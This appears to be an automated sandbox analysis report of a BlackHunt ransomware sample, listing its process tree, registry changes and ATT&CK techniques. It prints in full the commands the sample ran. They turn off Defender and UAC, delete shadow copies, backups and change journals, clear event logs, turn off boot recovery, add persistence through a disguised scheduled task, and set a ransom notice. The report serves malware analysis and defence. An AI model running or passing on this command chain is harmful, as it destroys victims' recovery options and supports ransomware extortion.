3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 123 PID 4636 wrote to memory of 448 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 129 PID 4636 wrote to memory of 448 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 129 PID 4636 wrote to memory of 4280 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 131 PID 4636 wrote to memory of 4280 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 131 PID 4636 wrote to memory of 4108 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 153 PID 4636 wrote to memory of 4108 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 153 PID 4856 wrote to memory of 3680 4856 cmd.exe 152 PID 4856 wrote to memory of 3680 4856 cmd.exe 152 PID 4636 wrote to memory of 4340 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 147 PID 4636 wrote to memory of 4340 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 147 PID 4636 wrote to memory of 540 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 134 PID 4636 wrote to memory of 540 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 134 PID 4636 wrote to memory of 4140 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 136 PID 4636 wrote to memory of 4140 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 136 PID 2720 wrote to memory of 2616 2720 cmd.exe 146 PID 2720 wrote to memory of 2616 2720 cmd.exe 146 PID 1508 wrote to memory of 996 1508 cmd.exe 142 PID 1508 wrote to memory of 996 1508 cmd.exe 142 PID 4636 wrote to memory of 4404 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 138 PID 4636 wrote to memory of 4404 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 138 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe"C:\Users\Admin\AppData\Local\Temp\3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4636 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:8 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:4740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:4644
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵PID:1672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:932
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2764
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:5216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:3220
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:4640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:3480
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:5260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1528
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:5476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1252
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:3144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2696
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:5572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3180
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:5516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:4796
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:5584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:448
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:5564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:4988
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:5396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:4280
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:5700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:540
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:5932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4140
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:5324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4404
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:5780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:3092
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:5812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1824
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:5796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4340
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:5424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:4108
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:5680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2600
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:5900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:5224
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:5276
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:5352
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:5820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:5444
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:7912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:5708
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:8660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:5888
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:6024
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:1552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:6080
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5692
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:5544
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe" /F2⤵PID:3404
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:4460
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:4200
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1508
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:8356
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵PID:10660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:7872
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
PID:7968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:6604
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
PID:7936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:6876
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:8252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:11612
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:12432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:9812
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:6288
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe"2⤵PID:5624
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:6204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:1180
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:10196
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10196 -s 8364⤵
- Program crash
PID:10064
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:6100
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:5492
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:10420
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:4788
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:11176
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:13208
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:13132
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:8752
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:8940
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:10412
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:10152
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:13420
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:10612
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:8320
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:5220
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:996
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:1396
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:5240
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6008
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:6096
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:5996
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe" /F1⤵
- Creates scheduled task(s)
PID:5972
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:9460
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:8784
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:9792
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\1⤵PID:11600
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System1⤵
- Clears Windows event logs
PID:11268
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:10276
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:11116
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:5308
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:8348
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f1⤵
- Kills process with taskkill
PID:12424
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f1⤵PID:12540
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F1⤵PID:9832
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt1⤵PID:6936
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f1⤵PID:7244
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 10196 -ip 101961⤵PID:8004
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:8776
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
PID:11120
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
PID:10452
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Adds Run key to start application
PID:1672
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\1⤵PID:12612
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
